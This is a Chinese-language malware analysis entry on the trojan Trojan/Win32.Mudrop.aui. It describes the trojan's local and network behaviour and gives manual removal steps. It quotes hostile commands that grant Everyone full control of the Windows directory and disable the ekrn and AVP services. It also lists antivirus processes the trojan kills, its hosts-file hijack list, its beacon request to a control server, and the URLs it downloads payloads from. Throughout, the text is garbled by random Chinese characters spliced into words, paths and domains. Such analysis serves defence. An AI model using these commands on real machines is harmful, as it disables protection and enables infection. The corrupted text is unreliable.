安可林文章网新闻资讯
Troja来自n/Win32.Mudrop教旧概别众们车蛋设.aui是一种木马病毒的名称。该木马运行后自动取得用户完全控制权限,关闭安全软件,发送本机信息给控制端,并自行下载大量病毒文件到本地,危害极大。
- 中文名 Trojan/Win32.Mudrop.aui
- 病毒类型 木马
- 公开范围 完全公开
- 危害等级 4
病毒简介
病毒标签: 病毒名称: Trojan/Win32.Mudrop.a来自ui[Dropper]
文件 MD5: 6CF94B87CBEABFA0CEC421F3E4827823
文件长度: 13,840 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: NsPacK V3.7
病毒描述: 该恶意代码文件为木马类,病毒运行后动获取大量A须粉变太课果PI函数,创建病毒互斥量"907ERT"防止病毒多次运行产生冲突,遍历%System32%目录下是否存在"explorer.exe"文件,调用CMD命令将%Windir%、%Temp%目录给予当前用户完全控制权限,停止ekrn、AVP安全软件服务、结束大量安全软件进程,衍生病毒DLL文件到%Sy他物应点次站士维我stem32%目录下,使用rundll32.exe启动病毒DLL文件,衍生病毒DLL到%Windir%目录下,动态获取病毒DLL的"FF"模块,进入该模块内后病毒判断自身进程是否360百科在"explorer.exe"进程中,如是则创建hosts文件、劫持大量域名群测情用河亲来觉已地址,调用API函数,查找含有windows 文件保护、找到恢复文件对话框的窗口,找到后将其窗口隐藏,在每个磁盘根目录下创建autorun.inf文件,添加注册表病毒服务创建病毒驱动文件,通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息,并下载大量病毒文件到本地。
行为描述
行为分析-本地行为:
1、病毒运行后动获取大量API函数,创建病毒互斥量"907ERT"防止病毒多次运行产生冲突,遍历%System32%目录下是否存在"explorer.exe"文件,调用CMD命令:"cmd /c cacls C:\WINDOWS /e /p everyone:f"将%Windir%、%T却丰针肉无决庆绍线emp%目录给予当前用户完全控制权限,使用:"cmd /c sc config ekrn start= disabled"、cmd /c sc config avp start= disabled探多织配停止ekrn、AVP安全软件服务。
2、动态通作研是获取病毒DLL的"FF"模块,进入该模块内后病毒判断后汉划自身进程是否在"explorer.exe"进程中,如是则创建hosts文件、劫持大量域名地址,调用API函数,查找含有windows 文件保护、找到恢复文件对话框的窗口,找到后将其窗口隐藏,确们答样来再书之在每个磁盘根目录下创建autorun.inf文件,通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息,被劫持的hosts域名列表:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsda断背天铁息旧世定sdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hack决确误底化行却路孩境erbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0口足审洲巴.0 ppp.etimes888.com
127.0.0.0 www验述送包慢树握.bypk.com
127.0.0.0 CSC终怕3-2004-crl.verisign.com
127.0.业息度求杨木席介意0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
12历亚7.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com降末导.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
12员言调图下顾再原代同7.0.0.1 my12推卷轻征齐住无3.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
3、监视以下进程发现后将其进程强行关闭:
rsmain.exe、scanfrm.exe、rsnetsvr.exe、rssafety.exe、avp.exe、safeboxtray.exe、360safe.exe、360safebox.exe、360tray.exe、antiarp.exe、ekrn.exe、egui.exe、ravmon.exe、ravmond.exe、ravtask.exe、ccenter.exe、ravstub.exe、ravstub.exe、rstray.exe、rstray.exe、rav.exe、rav.exe、rsaupd.exe、rsaupd.exe、agentsvr.exe、agentsvr.exe、qqdoctor.exe、drrtp.exe、mcproxy.exe、mcnasvc.exe、mcshield.exe、mpfsrv.exe、pccguide.exe、zonealarm.exe、zonealarm.exe、wink.exe、windows优化大师.exe、wfindv32.exe、webtrap.exe、webscanx.exe、webscan.exe、vsstat.exe、vshwin32.exe、vshwin32.exe、vsecomr.exe、vpc32.exe、vir.exe、vettray.exe、vet95.exe、vavrunr.exe、ulibcfg.exe、tsc.exe、tmupdito.exe、tmproxy.exe、tmoagent.exe、tmntsrv.exe、tds2-ntexe、tds298.exe、tca.exe、tbscan.exe、sweep95.exe、spy.exe、sphinx.exe、smtpsvc.exe、smc.exe、sirc32.exe、serv95.exe、secu.exe、scrscan.exe、scon.exe、scanpm.exe、scan32.exe、scan.exe、safeweb.exe、scam32.exe、rfw.exe、rfwmain.exe、rfwsrv.exe、rfwstub.exe、rfwproxy.exe、rescue32.exe、rav7win.exe、rav7.exe、ras.exe、pview95.exe、prot.exe、program.exe、ppppwallrun.exe、pop3trap.exe、persfw.exe、pcfwallicon.exe、pccwin98.exe、pccmain.exe、pcciomon.exe、pccclient.exe、navwnt.exe、navw32.exe、navw.exe、navsched.exe、navrunr.exe、navnt.exe、navlu32.exe、navapw32.exe、navapsvc.exe、n32acan.exe、moolive.exe、moniker.exe、mon.exe、mcafee.exe、lucomserver.exe、luall.exe、kwatch.exe、kvprescan.exe、kvmonxp.exe、krf.exe、kppmain.exe、kpfwsvc.exe、kpfw32.exe、kpfw32.exe、kissvc.exe、kavstart.exe、kav32.exe、kasmain.exe、kabackreport.exe、jed.exe、cfinet32.exe、cfinet.exe、cfind.exe、cfiaudit.exe、avwin95.exe、avsynmgr.exe、avsched32.exe、avpupd.exe、avkserv.exe、autodown.exe、antivir.exe、anti-trojan.exe、dvp95exe、dv95o.exe、dv95.exe、kaccore.exe、kmailmon.exe、nod32krn.exe、efcv.exe、avp.exe
4、病毒运行后衍生以下文件到系统目录下
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll
5、添加病毒注册表服务启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字符串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字符串: "System32\DRIVERS\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName
值: 字符串: "UPDATEDATA"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath
值: 字符串: "\??\C:\WINDOWS\system32\drivers\acpiec.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Type
值: DWORD: 1 (0x1)
行为分析-网络行为:GET /360/aa1dfh.txt?mac=00-0C-29-8C-9D-B6&ver=v1-300&key=146&os=windows HTTP/1.1
User-Agent: INet
Host: babi2009.com
Cache-Control: no-cache
描述:向该域名提交安装统计信息,并按以下列表下载大量恶意病毒文件
HTTP/1.1 200 OK
Content-Length: 1320
Content-Type: text/plain
Last-Modified: Thu, 25 Jun 2009 06:48:33 GMT
Accept-Ranges: bytes
ETag: "cee827f560f5c91:2c0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 30 Jun 2009 07:12:10 GMT
2:http://havvvha***.com/xiao/aa1.exe
2:http://havvvha***.com/xiao/aa2.exe
2:http://havvvha***.com/xiao/aa3.exe
2:http://havvvha***.com/xiao/aa4.exe
1:http://havvvha***.com/xiao/aa5.exe
2:http://havvvha***.com/xiao/aa6.exe
2:http://havvvha***.com/xiao/aa7.exe
2:http://havvvha***.com/xiao/aa8.exe
2:http://havvvha***.com/xiao/aa9.exe
2:http://havvvha***.com/xiao/aa10.exe
2:http://havvvha***.com/xiao/aa11.exe
2:http://havvvha***.com/xiao/aa12.exe
2:http://havvvha***.com/xiao/aa13.exe
2:http://havvvha***.com/xiao/aa14.exe
2:http://havvvha***.com/xiao/aa15.exe
2:http://havvvha***.com/xiao/aa16.exe
2:http://havvvha***.com/xiao/aa17.exe
2:http://havvvha***.com/xiao/aa18.exe
2:http://havvvha***.com/xiao/aa19.exe
2:http://havvvha***.com/xiao/aa20.exe
2:http://havvvha***.com/xiao/aa21.exe
2:http://havvvha***.com/xiao/aa22.exe
2:http://havvvha***.com/xiao/aa23.exe
2:http://havvvha***.com/xiao/aa24.exe
2:http://havvvha***.com/xiao/aa25.exe
2:http://havvvha***.com/xiao/aa26.exe
2:http://havvvha***.com/xiao/aa27.exe
2:http://havvvha***.com/xiao/aa28.exe
2:http://havvvha***.com/xiao/aa29.exe
2:http://havvvha***.com/xiao/aa30.exe
2:http://havvvha***.com/xiao/aa31.exe
2:http://havvvha***.com/xiao/aa32.exe
2:http://havvvha***.com/xiao/aa33.exe
2:http://havvvha***.com/xiao/aa34.exe
2:http://havvvha***.com/xiao/aa35.exe
2:http://havvvha***.com/xiao/aa36.exe
2:http://havvvha***.com/xiao/1.exe
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是C:\Windows\System
windowsXP中默认的安装路径是C:\Windows\System32
清除方法
清除方案: 1、使用安天防线可彻底清除此病毒(推荐)。
2、手工清除来自请按照行为分析删除对应文件热附围决,恢复相关系统设置。
360百科 推荐使用ATool管理工具。
(1) 使用ATOOL"进程管理"关闭病毒相关进程,结束rundll32.exe
(2)删除病毒连接网络下载的大量病毒衍生的文件 (注:病毒下载的列表内容会随时更换,所以衍生的文件也有可能变化)
%System32%\dri穿北vers\etc\hosts
%System跑陆粉固32%\drivers\OLD3.tmp
%System32%\drivers\pcidu架会强族玉硫肉位mp.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\php女块至历跳位住这i.dll
(3)删除病毒添加的注册表服务
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
删除Services 键值下的pcidump主键值
HKEY_LOCAL_MACH身计图概成INE\SYSTEM\Cont地rolSet001药语\Services\UPDATEDATA
删除UPDATEDATA 键值下的p汉cidump主键值
转载请注明出处安可林文章网 » Trojan/Win32.Mudrop.aui